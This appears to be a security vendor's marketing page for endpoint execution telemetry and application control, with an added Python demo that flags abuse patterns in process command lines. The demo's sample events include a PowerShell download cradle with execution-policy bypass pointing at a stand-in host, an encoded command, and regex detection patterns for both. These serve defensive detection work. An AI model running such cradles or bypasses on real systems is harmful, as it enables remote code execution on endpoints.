Use Case

Know What's Running

Execution Visibility That Drives Prevention

84% of high-severity breaches involve Living off the Land techniques — attacks that use legitimate, signed tools already present on the endpoint. EDR alone struggles to distinguish trusted administrative activity from malicious use of the same binaries. MagicSword closes that gap with deep endpoint telemetry and threat-driven execution control across Windows, macOS, and Linux.

Cross-Platform Endpoint Telemetry

Lightweight agents collect process execution data, software inventory, and browser extension details continuously across your fleet. Every execution event includes the context security teams need to assess risk and build policy.

  • Process execution with parent-child process chains and command line capture
  • Software inventory including Win32 applications and Microsoft Store apps
  • Browser extension inventory across Chrome, Edge, and Firefox
  • Windows event log collection including code integrity and enforcement events
  • File hash, publisher, and certificate verification per execution

Telemetry updates continuously via agent heartbeat.

Data collected per process:

1. Execution count and unique user count
2. Endpoints where the process has run
3. First seen and last seen timestamps
4. Command line samples with abuse pattern flagging
5. Parent process chain reconstruction

Platforms supported:

Windows — full process telemetry, software inventory, WDAC enforcement events
macOS — endpoint management and browser extension inventory
Linux — endpoint management and browser extension inventory

Closing the EDR Trust Gap

EDR excels at detection and response but faces a fundamental challenge: verifying the intent of trusted, signed tools. Over 200 legitimate Windows binaries are commonly abused by attackers, 505+ known vulnerable drivers can bypass security controls entirely, and 284 documented RMM tools are routinely weaponized. MagicSword adds the prevention layer EDR cannot — cross-referencing every execution against continuously updated threat intelligence to block documented abuse patterns before damage occurs.

Autonomous threat investigation:

1. Timeline analysis with execution context around suspicious activity
2. Cross-endpoint correlation and fleet-wide spread analysis
3. Command line abuse pattern detection — encoded commands, download cradles, policy bypass attempts
4. MITRE ATT&CK technique mapping for every finding

This enables:

  • Immediate blocklisting of abused RMM tools across 284 tracked tools
  • Proactive BYOVD protection against 505+ known vulnerable drivers
  • Signed binary abuse defense across 200+ commonly abused Windows binaries
  • Continuous malware-free attack prevention powered by LOLBAS, LOLDrivers, and LOLRMM research
  • Direct conversion of findings into WDAC policy rules
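The two lists above ("Data collected per process" and "Autonomous threat investigation") describe an aggregation and cross-reference workflow. The following Python is an added example written for this page, not MagicSword code, showing the shape of that workflow on constructed process execution events: per-image execution counts, unique users, endpoints, first/last seen, parent chains, command line abuse flagging (encoded commands are decoded and re-scanned), and a cross-reference against a small assumed subset of LOLBAS/LOLRMM-style binary names. The event format, the regexes, and the binary list are assumptions for the demo, not the product's own rules or data.

```python
"""Added demo: per-process telemetry aggregation plus command line abuse
flagging and a cross-reference against tracked binaries. Event schema,
patterns and lists are assumptions for this example, not product data."""
import base64
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Assumed: a tiny subset of names in the style of the LOLBAS / LOLRMM lists,
# present only to show the cross-reference step (not the real lists).
TRACKED_BINARIES = {
    "mshta.exe": "LOLBAS",
    "rundll32.exe": "LOLBAS",
    "certutil.exe": "LOLBAS",
    "anydesk.exe": "LOLRMM",
}

# The three abuse pattern families named on the page; regexes are assumptions.
ABUSE_PATTERNS = {
    "encoded_command": re.compile(
        r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})"),
    "download_cradle": re.compile(
        r"(?i)(?:downloadstring|downloadfile|invoke-webrequest|iwr\s|-urlcache)"),
    "policy_bypass": re.compile(r"(?i)-(?:ep|executionpolicy)\s+bypass"),
}


@dataclass
class ProcessStats:
    """Per-image aggregate mirroring the 'Data collected per process' list."""
    executions: int = 0
    users: set = field(default_factory=set)
    endpoints: set = field(default_factory=set)
    first_seen: str = ""
    last_seen: str = ""
    parents: set = field(default_factory=set)
    samples: list = field(default_factory=list)  # (cmdline, sorted flags)


def decode_encoded_command(blob):
    """PowerShell -EncodedCommand carries base64 of UTF-16LE text."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def flag_cmdline(cmdline):
    """Return the set of abuse pattern names a command line matches.
    An encoded payload is decoded and re-scanned so a cradle hidden
    behind -enc is still reported as download_cradle."""
    flags = {name for name, rx in ABUSE_PATTERNS.items() if rx.search(cmdline)}
    m = ABUSE_PATTERNS["encoded_command"].search(cmdline)
    if m:
        inner = decode_encoded_command(m.group(1))
        if inner:
            flags |= flag_cmdline(inner) - {"encoded_command"}
    return flags


def aggregate(events):
    """Build per-image stats from execution events, ordered by timestamp."""
    stats = defaultdict(ProcessStats)
    for ev in sorted(events, key=lambda e: e["ts"]):
        s = stats[ev["image"].lower()]
        s.executions += 1
        s.users.add(ev["user"])
        s.endpoints.add(ev["host"])
        s.first_seen = s.first_seen or ev["ts"]
        s.last_seen = ev["ts"]
        s.parents.add(ev["parent"].lower())
        flags = flag_cmdline(ev["cmdline"])
        if flags:
            s.samples.append((ev["cmdline"], sorted(flags)))
    return dict(stats)


def findings(events):
    """Cross-reference aggregates against tracked lists and flagged samples.
    Returns (image, reason) pairs a policy author could review for deny rules."""
    out = []
    for image, s in aggregate(events).items():
        if image in TRACKED_BINARIES:
            out.append((image, "listed:" + TRACKED_BINARIES[image]))
        for _cmd, flags in s.samples:
            out.append((image, "cmdline:" + ",".join(flags)))
    return out


# Constructed sample events (not real telemetry). The -enc payload is just
# "Get-Date"; the cradle URL uses the reserved .invalid TLD.
ENC = base64.b64encode("Get-Date".encode("utf-16le")).decode()
EVENTS = [
    {"host": "WS-01", "user": "alice", "ts": "2024-03-01T09:00:00Z", "image": "powershell.exe",
     "parent": "explorer.exe", "cmdline": "powershell.exe -NoProfile Get-Process"},
    {"host": "WS-02", "user": "bob", "ts": "2024-03-01T10:15:00Z", "image": "powershell.exe",
     "parent": "winword.exe", "cmdline": "powershell.exe -w hidden -enc " + ENC},
    {"host": "WS-02", "user": "bob", "ts": "2024-03-01T10:16:00Z", "image": "powershell.exe",
     "parent": "winword.exe", "cmdline": "powershell.exe -ep bypass -c \"(New-Object Net.WebClient)"
     ".DownloadString('http://example.invalid/a')\""},
    {"host": "WS-03", "user": "carol", "ts": "2024-03-01T11:00:00Z", "image": "mshta.exe",
     "parent": "explorer.exe", "cmdline": "mshta.exe C:\\Users\\carol\\report.hta"},
    {"host": "WS-01", "user": "alice", "ts": "2024-03-02T08:00:00Z", "image": "notepad.exe",
     "parent": "explorer.exe", "cmdline": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for image, s in aggregate(EVENTS).items():
        print(image, s.executions, len(s.users), sorted(s.endpoints), s.first_seen, s.last_seen)
    for image, reason in findings(EVENTS):
        print("finding:", image, reason)
```

Running the block prints powershell.exe with 3 executions, 2 unique users, endpoints WS-01 and WS-02, and two findings (policy bypass plus download cradle on one line, an encoded command on another), while mshta.exe is reported only because it is on the assumed tracked list; notepad.exe produces no finding. Decoding the encoded payload before matching is the step that matters in practice, since the encoded form is what hides a cradle from a plain substring search.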

Per Role. Per Endpoint. Without Guesswork.

MagicSword allows organizations to control what can run based on group, role, and endpoint. Security teams get a clear view of execution patterns and the tools to act on them.

  • See what is allowed, blocked, and audited per endpoint
  • Identify risky execution pathways through parent-child process chains
  • Enforce policies aligned to real usage patterns across the fleet
  • Track software inventory and version distribution across all endpoints
  • Reduce unnecessary exposure with measurable endpoint attack surface reduction

The Trust Gap

EDR detects and responds. Application control prevents and enforces. Together they create defense in depth — stopping attacks at multiple independent chokepoints before they escalate.

Figure: The EDR Trust Gap — EDR struggles to verify the intent of trusted tools, while Application Control provides prevention and policy enforcement

The Outcome

With deep endpoint telemetry and execution visibility, organizations gain:

  • Process-level visibility into every execution across the fleet
  • Practical Zero Trust endpoint security grounded in real data
  • Prevention of malware-free attacks that bypass EDR detection
  • Reduced false positives through execution context and threat correlation
  • Lower incident response workload with autonomous threat investigation
  • Cross-platform endpoint coverage across Windows, macOS, and Linux

Visibility informs decisions. Execution control enforces them.

Ready to Strengthen Your Security Posture?

Deploy threat-driven application control in minutes. No specialized engineers required.